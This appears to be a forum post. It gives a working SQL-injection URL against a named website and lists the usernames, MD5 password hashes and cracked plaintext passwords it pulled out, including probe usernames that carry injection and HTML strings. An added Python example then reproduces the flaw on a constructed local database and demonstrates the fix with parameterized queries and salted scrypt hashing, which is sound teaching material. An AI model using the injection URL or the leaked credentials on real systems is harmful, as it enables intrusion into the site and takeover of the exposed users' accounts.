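Here's another bombshell:
http://mb.zhiqing.info/u/%22%20union%20ALL%20select%20name%20as%20user,password%20as%20post,%200%20as%20time%20from%20users%20where%20%22%22=%22
Judging from the results returned, and from the way the code writes the password, it is the result of MD5 + base64, so...
Below are the passwords of the accounts listed so far:
zhiqing f57b888bc53ccfa3e4a71f19604df23c Found, but it is an entry that can only be viewed after paying.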
qwe 76d80224611fc919a5d54f0ff9fba446 qwe
123 202cb962ac59075b964b07152d234b70 123
<h1>123</h1> 5e6535e26cf8c546395f4e3f4c5d189e Not found
123qwe 46f94c8de14fb36680850768ff1b7f2a 123qwe
3123 e10adc3949ba59abbe56e057f20f883e 123456
<img src=x> eb6cd2e33d39e677b19b611fe2eb32ee Not found
jerry 202cb962ac59075b964b07152d234b70 123
foo 37b51d194a7513e45b56f6524f2d51f2 bar
" or ""=" e10adc3949ba59abbe56e057f20f883e 123456
tet111 4297f44b13955235245b2497399d7a93 123123
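
The two weaknesses this post shows, a user path segment concatenated into SQL and passwords stored as unsalted MD5, can be reproduced and fixed locally. The following is an added example, not code from the original post or from the site: the `posts` table, the query shape and all rows are constructed assumptions, and only the percent-encoded path segment is taken from the URL above.

```python
import hashlib
import hmac
import os
import sqlite3
from urllib.parse import unquote

# Path segment from the URL in the post, percent-decoded.
PAYLOAD = unquote("%22%20union%20ALL%20select%20name%20as%20user,password%20as%20post,"
                  "%200%20as%20time%20from%20users%20where%20%22%22=%22")

def make_db():
    # Constructed schema and rows; the site's real tables are not shown on the page.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(name TEXT, password TEXT);
        CREATE TABLE posts(user TEXT, post TEXT, time INTEGER);
        INSERT INTO users VALUES ('alice', 'constructed-hash-1'), ('bob', 'constructed-hash-2');
        INSERT INTO posts VALUES ('alice', 'hello', 1);
    """)
    return db

def posts_vulnerable(db, user):
    # Assumed shape of the flawed query: the path segment is pasted into the SQL text,
    # so a double quote in it ends the string literal and the rest runs as SQL.
    sql = 'SELECT user, post, time FROM posts WHERE user = "' + user + '"'
    return db.execute(sql).fetchall()

def posts_parameterized(db, user):
    # Bound parameter: the value is compared as data and never parsed as SQL.
    return db.execute("SELECT user, post, time FROM posts WHERE user = ?", (user,)).fetchall()

def hash_password(password, salt=None):
    # Per-user random salt plus a memory-hard KDF, so equal passwords no longer
    # share a digest and precomputed MD5 lookups do not apply.
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1)
    return salt, digest

def verify_password(password, salt, digest):
    # Constant-time comparison of the recomputed digest.
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", posts_vulnerable(db, PAYLOAD))
    print("parameterized:", posts_parameterized(db, PAYLOAD))
```

With the concatenated query the constructed `users` rows come back in the `user`/`post` columns, while the parameterized query returns nothing for the same input.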